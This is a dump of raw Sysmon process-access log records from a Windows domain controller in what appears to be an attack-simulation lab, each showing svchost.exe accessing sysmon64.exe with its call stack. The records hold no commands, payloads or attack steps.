10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.120{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.088{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 